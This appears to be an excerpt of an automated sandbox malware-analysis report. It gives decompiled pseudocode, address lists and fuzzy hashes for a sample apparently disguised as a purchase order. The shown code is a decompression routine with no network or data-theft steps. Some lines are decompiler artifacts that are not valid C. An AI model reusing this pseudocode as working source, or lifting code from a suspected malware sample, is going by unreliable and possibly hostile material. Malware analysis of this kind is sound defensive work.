                      											} else {
                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      												 *(__ebp - 0x10) = __ecx;
                      												0x800 = 0x800 - __edx;
                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      												__ebx = __ebx + __ebx;
                      												 *__esi = __cx;
                      											}
                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                      											 *(__ebp - 0x44) = __ebx;
                      											if( *(__ebp - 0x10) >= 0x1000000) {
                      												goto L39;
                      											} else {
                      												goto L37;
                      											}
                      										case 0xe:
                      											L46:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xe;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t156 = __ebp - 0x70;
                      											 *_t156 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t156;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											while(1) {
                      												L48:
                      												__eflags = __ebx - 0x100;
                      												if(__ebx >= 0x100) {
                      													break;
                      												}
                      												__eax =  *(__ebp - 0x58);
                      												__edx = __ebx + __ebx;
                      												__ecx =  *(__ebp - 0x10);
                      												__esi = __edx + __eax;
                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                      												__ax =  *__esi;
                      												 *(__ebp - 0x54) = __esi;
                      												__edi = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													_t170 = __edx + 1; // 0x1
                      													__ebx = _t170;
                      													__cx = __ax >> 5;
                      													__eflags = __eax;
                      													 *__esi = __ax;
                      												} else {
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edi;
                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      													__ebx = __ebx + __ebx;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													continue;
                      												} else {
                      													goto L46;
                      												}
                      											}
                      											L54:
                      											_t173 = __ebp - 0x34;
                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                      											__eflags =  *_t173;
                      											goto L55;
                      										case 0xf:
                      											L58:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xf;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t203 = __ebp - 0x70;
                      											 *_t203 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t203;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L60:
                      											__eflags = __ebx - 0x100;
                      											if(__ebx >= 0x100) {
                      												L55:
                      												__al =  *(__ebp - 0x44);
                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                      												goto L56;
                      											}
                      											L61:
                      											__eax =  *(__ebp - 0x58);
                      											__edx = __ebx + __ebx;
                      											__ecx =  *(__ebp - 0x10);
                      											__esi = __edx + __eax;
                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                      											__ax =  *__esi;
                      											 *(__ebp - 0x54) = __esi;
                      											__edi = __ax & 0x0000ffff;
                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      											__eflags =  *(__ebp - 0xc) - __ecx;
                      											if( *(__ebp - 0xc) >= __ecx) {
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      												__cx = __ax;
                      												_t217 = __edx + 1; // 0x1
                      												__ebx = _t217;
                      												__cx = __ax >> 5;
                      												__eflags = __eax;
                      												 *__esi = __ax;
                      											} else {
                      												 *(__ebp - 0x10) = __ecx;
                      												0x800 = 0x800 - __edi;
                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      												__ebx = __ebx + __ebx;
                      												 *__esi = __cx;
                      											}
                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                      											 *(__ebp - 0x44) = __ebx;
                      											if( *(__ebp - 0x10) >= 0x1000000) {
                      												goto L60;
                      											} else {
                      												goto L58;
                      											}
                      										case 0x10:
                      											L110:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0x10;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t366 = __ebp - 0x70;
                      											 *_t366 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t366;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											goto L112;
                      										case 0x11:
                      											L69:
                      											__esi =  *(__ebp - 0x58);
                      											 *(__ebp - 0x84) = 0x12;
                      											L132:
                      											 *(_t612 - 0x54) = _t605;
                      											goto L133;
                      										case 0x12:
                      											goto L0;
                      										case 0x13:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												_t469 = __ebp - 0x58;
                      												 *_t469 =  *(__ebp - 0x58) + 0x204;
                      												__eflags =  *_t469;
                      												 *(__ebp - 0x30) = 0x10;
                      												 *(__ebp - 0x40) = 8;
                      												goto L144;
                      											}
                      											__eax =  *(__ebp - 0x4c);
                      											__ecx =  *(__ebp - 0x58);
                      											__eax =  *(__ebp - 0x4c) << 4;
                      											 *(__ebp - 0x30) = 8;
                      											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                      											goto L130;
                      										case 0x14:
                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                      											__eax =  *(__ebp - 0x80);
                      											L140:
                      											 *(_t612 - 0x88) = _t533;
                      											goto L1;
                      										case 0x15:
                      											__eax = 0;
                      											__eflags =  *(__ebp - 0x38) - 7;
                      											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      											__al = __al & 0x000000fd;
                      											__eax = (__eflags >= 0) - 1 + 0xb;
                      											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                      											goto L121;
                      										case 0x16:
                      											__eax =  *(__ebp - 0x30);
                      											__eflags = __eax - 4;
                      											if(__eax >= 4) {
                      												_push(3);
                      												_pop(__eax);
                      											}
                      											__ecx =  *(__ebp - 4);
                      											 *(__ebp - 0x40) = 6;
                      											__eax = __eax << 7;
                      											 *(__ebp - 0x7c) = 0x19;
                      											 *(__ebp - 0x58) = __eax;
                      											goto L145;
                      										case 0x17:
                      											goto L145;
                      										case 0x18:
                      											L146:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0x18;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t484 = __ebp - 0x70;
                      											 *_t484 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t484;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L148:
                      											_t487 = __ebp - 0x48;
                      											 *_t487 =  *(__ebp - 0x48) - 1;
                      											__eflags =  *_t487;
                      											goto L149;
                      										case 0x19:
                      											__eflags = __ebx - 4;
                      											if(__ebx < 4) {
                      												 *(__ebp - 0x2c) = __ebx;
                      												L120:
                      												_t394 = __ebp - 0x2c;
                      												 *_t394 =  *(__ebp - 0x2c) + 1;
                      												__eflags =  *_t394;
                      												L121:
                      												__eax =  *(__ebp - 0x2c);
                      												__eflags = __eax;
                      												if(__eax == 0) {
                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                      													goto L170;
                      												}
                      												__eflags = __eax -  *(__ebp - 0x60);
                      												if(__eax >  *(__ebp - 0x60)) {
                      													goto L171;
                      												}
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                      												__eax =  *(__ebp - 0x30);
                      												_t401 = __ebp - 0x60;
                      												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                      												__eflags =  *_t401;
                      												goto L124;
                      											}
                      											__ecx = __ebx;
                      											__eax = __ebx;
                      											__ecx = __ebx >> 1;
                      											__eax = __ebx & 0x00000001;
                      											__ecx = (__ebx >> 1) - 1;
                      											__al = __al | 0x00000002;
                      											__eax = (__ebx & 0x00000001) << __cl;
                      											__eflags = __ebx - 0xe;
                      											 *(__ebp - 0x2c) = __eax;
                      											if(__ebx >= 0xe) {
                      												__ebx = 0;
                      												 *(__ebp - 0x48) = __ecx;
                      												L103:
                      												__eflags =  *(__ebp - 0x48);
                      												if( *(__ebp - 0x48) <= 0) {
                      													__eax = __eax + __ebx;
                      													 *(__ebp - 0x40) = 4;
                      													 *(__ebp - 0x2c) = __eax;
                      													__eax =  *(__ebp - 4);
                      													__eax =  *(__ebp - 4) + 0x644;
                      													__eflags = __eax;
                      													L109:
                      													__ebx = 0;
                      													 *(__ebp - 0x58) = __eax;
                      													 *(__ebp - 0x50) = 1;
                      													 *(__ebp - 0x44) = 0;
                      													 *(__ebp - 0x48) = 0;
                      													L113:
                      													__eax =  *(__ebp - 0x40);
                      													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                      														_t392 = __ebp - 0x2c;
                      														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                      														__eflags =  *_t392;
                      														goto L120;
                      													}
                      													__eax =  *(__ebp - 0x50);
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      													__eax =  *(__ebp - 0x58);
                      													__esi = __edi + __eax;
                      													 *(__ebp - 0x54) = __esi;
                      													__ax =  *__esi;
                      													__ecx = __ax & 0x0000ffff;
                      													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                      													__eflags =  *(__ebp - 0xc) - __edx;
                      													if( *(__ebp - 0xc) >= __edx) {
                      														__ecx = 0;
                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                      														__ecx = 1;
                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                      														__ebx = 1;
                      														__ecx =  *(__ebp - 0x48);
                      														__ebx = 1 << __cl;
                      														__ecx = 1 << __cl;
                      														__ebx =  *(__ebp - 0x44);
                      														__ebx =  *(__ebp - 0x44) | __ecx;
                      														__cx = __ax;
                      														__cx = __ax >> 5;
                      														__eax = __eax - __ecx;
                      														__edi = __edi + 1;
                      														__eflags = __edi;
                      														 *(__ebp - 0x44) = __ebx;
                      														 *__esi = __ax;
                      														 *(__ebp - 0x50) = __edi;
                      													} else {
                      														 *(__ebp - 0x10) = __edx;
                      														0x800 = 0x800 - __ecx;
                      														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                      														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      														 *__esi = __dx;
                      													}
                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                      													if( *(__ebp - 0x10) >= 0x1000000) {
                      														L112:
                      														_t369 = __ebp - 0x48;
                      														 *_t369 =  *(__ebp - 0x48) + 1;
                      														__eflags =  *_t369;
                      														goto L113;
                      													} else {
                      														goto L110;
                      													}
                      												}
                      												__ecx =  *(__ebp - 0xc);
                      												__ebx = __ebx + __ebx;
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                      												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                      													__ecx =  *(__ebp - 0x10);
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      													__ebx = __ebx | 0x00000001;
                      													__eflags = __ebx;
                      													 *(__ebp - 0x44) = __ebx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													L102:
                      													_t339 = __ebp - 0x48;
                      													 *_t339 =  *(__ebp - 0x48) - 1;
                      													__eflags =  *_t339;
                      													goto L103;
                      												} else {
                      													goto L100;
                      												}
                      											}
                      											__edx =  *(__ebp - 4);
                      											__eax = __eax - __ebx;
                      											 *(__ebp - 0x40) = __ecx;
                      											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                      											goto L109;
                      										case 0x1a:
                      											L56:
                      											__eflags =  *(__ebp - 0x64);
                      											if( *(__ebp - 0x64) == 0) {
                      												 *(__ebp - 0x88) = 0x1a;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x68);
                      											__al =  *(__ebp - 0x5c);
                      											__edx =  *(__ebp - 8);
                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      											 *( *(__ebp - 0x68)) = __al;
                      											__ecx =  *(__ebp - 0x14);
                      											 *(__ecx +  *(__ebp - 8)) = __al;
                      											__eax = __ecx + 1;
                      											__edx = 0;
                      											_t192 = __eax %  *(__ebp - 0x74);
                      											__eax = __eax /  *(__ebp - 0x74);
                      											__edx = _t192;
                      											goto L80;
                      										case 0x1b:
                      											L76:
                      											__eflags =  *(__ebp - 0x64);
                      											if( *(__ebp - 0x64) == 0) {
                      												 *(__ebp - 0x88) = 0x1b;
                      												goto L170;
                      											}
                      											__eax =  *(__ebp - 0x14);
                      											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      											__eflags = __eax -  *(__ebp - 0x74);
                      											if(__eax >=  *(__ebp - 0x74)) {
                      												__eax = __eax +  *(__ebp - 0x74);
                      												__eflags = __eax;
                      											}
                      											__edx =  *(__ebp - 8);
                      											__cl =  *(__eax + __edx);
                      											__eax =  *(__ebp - 0x14);
                      											 *(__ebp - 0x5c) = __cl;
                      											 *(__eax + __edx) = __cl;
                      											__eax = __eax + 1;
                      											__edx = 0;
                      											_t275 = __eax %  *(__ebp - 0x74);
                      											__eax = __eax /  *(__ebp - 0x74);
                      											__edx = _t275;
                      											__eax =  *(__ebp - 0x68);
                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      											_t284 = __ebp - 0x64;
                      											 *_t284 =  *(__ebp - 0x64) - 1;
                      											__eflags =  *_t284;
                      											 *( *(__ebp - 0x68)) = __cl;
                      											L80:
                      											 *(__ebp - 0x14) = __edx;
                      											goto L81;
                      										case 0x1c:
                      											while(1) {
                      												L124:
                      												__eflags =  *(__ebp - 0x64);
                      												if( *(__ebp - 0x64) == 0) {
                      													break;
                      												}
                      												__eax =  *(__ebp - 0x14);
                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      												__eflags = __eax -  *(__ebp - 0x74);
                      												if(__eax >=  *(__ebp - 0x74)) {
                      													__eax = __eax +  *(__ebp - 0x74);
                      													__eflags = __eax;
                      												}
                      												__edx =  *(__ebp - 8);
                      												__cl =  *(__eax + __edx);
                      												__eax =  *(__ebp - 0x14);
                      												 *(__ebp - 0x5c) = __cl;
                      												 *(__eax + __edx) = __cl;
                      												__eax = __eax + 1;
                      												__edx = 0;
                      												_t415 = __eax %  *(__ebp - 0x74);
                      												__eax = __eax /  *(__ebp - 0x74);
                      												__edx = _t415;
                      												__eax =  *(__ebp - 0x68);
                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                      												__eflags =  *(__ebp - 0x30);
                      												 *( *(__ebp - 0x68)) = __cl;
                      												 *(__ebp - 0x14) = _t415;
                      												if( *(__ebp - 0x30) > 0) {
                      													continue;
                      												} else {
                      													L81:
                      													 *(__ebp - 0x88) = 2;
                      													goto L1;
                      												}
                      											}
                      											 *(__ebp - 0x88) = 0x1c;
                      											L170:
                      											_push(0x22);
                      											_pop(_t567);
                      											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                      											_t535 = 0;
                      											L172:
                      											return _t535;
                      									}
                      								}
                      								L171:
                      								_t535 = _t534 | 0xffffffff;
                      								goto L172;
                      							}
                      						}
                      						__eax =  *(__ebp - 0x50);
                      						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      						__eax =  *(__ebp - 0x58);
                      						__esi = __edx + __eax;
                      						 *(__ebp - 0x54) = __esi;
                      						__ax =  *__esi;
                      						__edi = __ax & 0x0000ffff;
                      						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      						if( *(__ebp - 0xc) >= __ecx) {
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      							__cx = __ax;
                      							__cx = __ax >> 5;
                      							__eax = __eax - __ecx;
                      							__edx = __edx + 1;
                      							 *__esi = __ax;
                      							 *(__ebp - 0x50) = __edx;
                      						} else {
                      							 *(__ebp - 0x10) = __ecx;
                      							0x800 = 0x800 - __edi;
                      							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      							 *__esi = __cx;
                      						}
                      						if( *(__ebp - 0x10) >= 0x1000000) {
                      							goto L148;
                      						} else {
                      							goto L146;
                      						}
                      					}
                      					goto L1;
                      				}
                      			}








                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x004068d2
                      0x004068d8
                      0x004068da
                      0x004068e1
                      0x004068e3
                      0x004068ea
                      0x004068ee
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00406734
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00406811
                      0x00000000
                      0x00406686

                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                      • Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
                      • Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                      • Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E00406398() {
                      				unsigned short _t532;
                      				signed int _t533;
                      				void _t534;
                      				void* _t535;
                      				signed int _t536;
                      				signed int _t565;
                      				signed int _t568;
                      				signed int _t589;
                      				signed int* _t606;
                      				void* _t613;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					if( *(_t613 - 0x40) != 0) {
                      						L89:
                      						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                      						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                      						L69:
                      						_t606 =  *(_t613 - 0x58);
                      						 *(_t613 - 0x84) = 0x12;
                      						L132:
                      						 *(_t613 - 0x54) = _t606;
                      						L133:
                      						_t532 =  *_t606;
                      						_t589 = _t532 & 0x0000ffff;
                      						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                      						if( *(_t613 - 0xc) >= _t565) {
                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                      							 *(_t613 - 0x40) = 1;
                      							_t533 = _t532 - (_t532 >> 5);
                      							 *_t606 = _t533;
                      						} else {
                      							 *(_t613 - 0x10) = _t565;
                      							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                      						}
                      						if( *(_t613 - 0x10) >= 0x1000000) {
                      							L139:
                      							_t534 =  *(_t613 - 0x84);
                      							L140:
                      							 *(_t613 - 0x88) = _t534;
                      							goto L1;
                      						} else {
                      							L137:
                      							if( *(_t613 - 0x6c) == 0) {
                      								 *(_t613 - 0x88) = 5;
                      								goto L170;
                      							}
                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                      							goto L139;
                      						}
                      					} else {
                      						if( *(__ebp - 0x60) == 0) {
                      							L171:
                      							_t536 = _t535 | 0xffffffff;
                      							L172:
                      							return _t536;
                      						}
                      						__eax = 0;
                      						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                      						0 | _t258 = _t258 + _t258 + 9;
                      						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                      						L75:
                      						if( *(__ebp - 0x64) == 0) {
                      							 *(__ebp - 0x88) = 0x1b;
                      							L170:
                      							_t568 = 0x22;
                      							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                      							_t536 = 0;
                      							goto L172;
                      						}
                      						__eax =  *(__ebp - 0x14);
                      						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      						if(__eax >=  *(__ebp - 0x74)) {
                      							__eax = __eax +  *(__ebp - 0x74);
                      						}
                      						__edx =  *(__ebp - 8);
                      						__cl =  *(__eax + __edx);
                      						__eax =  *(__ebp - 0x14);
                      						 *(__ebp - 0x5c) = __cl;
                      						 *(__eax + __edx) = __cl;
                      						__eax = __eax + 1;
                      						__edx = 0;
                      						_t274 = __eax %  *(__ebp - 0x74);
                      						__eax = __eax /  *(__ebp - 0x74);
                      						__edx = _t274;
                      						__eax =  *(__ebp - 0x68);
                      						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      						_t283 = __ebp - 0x64;
                      						 *_t283 =  *(__ebp - 0x64) - 1;
                      						 *( *(__ebp - 0x68)) = __cl;
                      						L79:
                      						 *(__ebp - 0x14) = __edx;
                      						L80:
                      						 *(__ebp - 0x88) = 2;
                      					}
                      					L1:
                      					_t535 =  *(_t613 - 0x88);
                      					if(_t535 > 0x1c) {
                      						goto L171;
                      					}
                      					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
                      						case 0:
                      							if( *(_t613 - 0x6c) == 0) {
                      								goto L170;
                      							}
                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      							_t535 =  *( *(_t613 - 0x70));
                      							if(_t535 > 0xe1) {
                      								goto L171;
                      							}
                      							_t539 = _t535 & 0x000000ff;
                      							_push(0x2d);
                      							asm("cdq");
                      							_pop(_t570);
                      							_push(9);
                      							_pop(_t571);
                      							_t609 = _t539 / _t570;
                      							_t541 = _t539 % _t570 & 0x000000ff;
                      							asm("cdq");
                      							_t604 = _t541 % _t571 & 0x000000ff;
                      							 *(_t613 - 0x3c) = _t604;
                      							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                      							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                      							_t612 = (0x300 << _t604 + _t609) + 0x736;
                      							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                      								L10:
                      								if(_t612 == 0) {
                      									L12:
                      									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                      									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      									goto L15;
                      								} else {
                      									goto L11;
                      								}
                      								do {
                      									L11:
                      									_t612 = _t612 - 1;
                      									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                      								} while (_t612 != 0);
                      								goto L12;
                      							}
                      							if( *(_t613 - 4) != 0) {
                      								GlobalFree( *(_t613 - 4));
                      							}
                      							_t535 = GlobalAlloc(0x40, 0x600); // executed
                      							 *(_t613 - 4) = _t535;
                      							if(_t535 == 0) {
                      								goto L171;
                      							} else {
                      								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                      								goto L10;
                      							}
                      						case 1:
                      							L13:
                      							__eflags =  *(_t613 - 0x6c);
                      							if( *(_t613 - 0x6c) == 0) {
                      								 *(_t613 - 0x88) = 1;
                      								goto L170;
                      							}
                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      							_t45 = _t613 - 0x48;
                      							 *_t45 =  *(_t613 - 0x48) + 1;
                      							__eflags =  *_t45;
                      							L15:
                      							if( *(_t613 - 0x48) < 4) {
                      								goto L13;
                      							}
                      							_t547 =  *(_t613 - 0x40);
                      							if(_t547 ==  *(_t613 - 0x74)) {
                      								L20:
                      								 *(_t613 - 0x48) = 5;
                      								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                      								goto L23;
                      							}
                      							 *(_t613 - 0x74) = _t547;
                      							if( *(_t613 - 8) != 0) {
                      								GlobalFree( *(_t613 - 8));
                      							}
                      							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                      							 *(_t613 - 8) = _t535;
                      							if(_t535 == 0) {
                      								goto L171;
                      							} else {
                      								goto L20;
                      							}
                      						case 2:
                      							L24:
                      							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                      							 *(_t613 - 0x84) = 6;
                      							 *(_t613 - 0x4c) = _t554;
                      							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                      							goto L132;
                      						case 3:
                      							L21:
                      							__eflags =  *(_t613 - 0x6c);
                      							if( *(_t613 - 0x6c) == 0) {
